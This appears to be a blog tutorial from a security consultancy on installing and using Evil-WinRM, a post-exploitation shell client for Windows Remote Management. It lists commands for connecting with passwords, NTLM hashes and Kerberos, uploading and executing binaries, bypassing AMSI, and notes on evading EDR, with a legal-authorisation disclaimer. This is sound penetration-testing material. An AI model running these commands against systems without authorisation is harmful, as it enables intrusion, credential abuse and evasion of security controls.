Evil-WinRM — Install, Use, Optimise (2026)

Manish Garg
Manish Garg Associate of (ISC)² · RingSafe
Apr 29, 2026
2 min read

WinRM shell client with built-in post-exploitation features — file upload/download, AMSI bypass, in-memory PowerShell execution.

Use case: Active DirectoryDifficulty: IntermediateHomepage: https://github.com/Hackplayers/evil-winrm

Installation

Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.

Ruby gem

gem install evil-winrm

Docker

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 10.0.0.5 -u admin -p pass

Linux (apt)

sudo apt install evil-winrm

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

Connect with password

evil-winrm -i 10.0.0.5 -u admin -p pass

Connect with NTLM hash

evil-winrm -i 10.0.0.5 -u admin -H aad3b4...

Connect with Kerberos

evil-winrm -i WS01.corp.local -u admin -k

Upload file

upload local.exe C:WindowsTemplocal.exe

Run obfuscated PS1

invoke-binary "C:WindowsTempTool.exe"

Bypass AMSI

Bypass-4MSI

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

  • -s scripts/ auto-loads scripts (.ps1) into the session — saves upload step.
  • -S SSL mode (port 5986) — encrypted, less detected on the wire.
  • -c auto-confirms — useful in scripted attacks.
  • -l log all commands to file — essential for engagement reporting.
  • AMSI bypass built-in (Bypass-4MSI) — but signatures change; test in lab first.

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

  • WinRM service must be enabled on target (Windows server default; client edition often off).
  • Default port 5985 (HTTP) vs 5986 (HTTPS) — choose 5986 for encrypted ops.
  • EDR detects evil-winrm by user-agent + Ruby HTTP library quirks. Some go undetected; CrowdStrike/SentinelOne flag.
  • invoke-binary requires staged binary on disk — drops to disk briefly.

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

  • NetExec winrm — same protocol, integrated.
  • WinRM-PS (PowerShell native).

India context and engagement notes

For Indian internal pen-tests: WinRM is widely enabled on Windows servers. Once you have admin creds (from Mimikatz / NTLM relay / etc.), evil-winrm is the fastest path to interactive shell. Always log commands for the report.


⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.

Want this for your team?

Custom team training + practitioner advisory

Beyond the free academy — we run private workshops, vCISO advisory, and red-team exercises tailored to your stack. For Indian SMBs scaling past their first hire.

Book team training call Replies in 4 working hrs · India-only · Senior consultants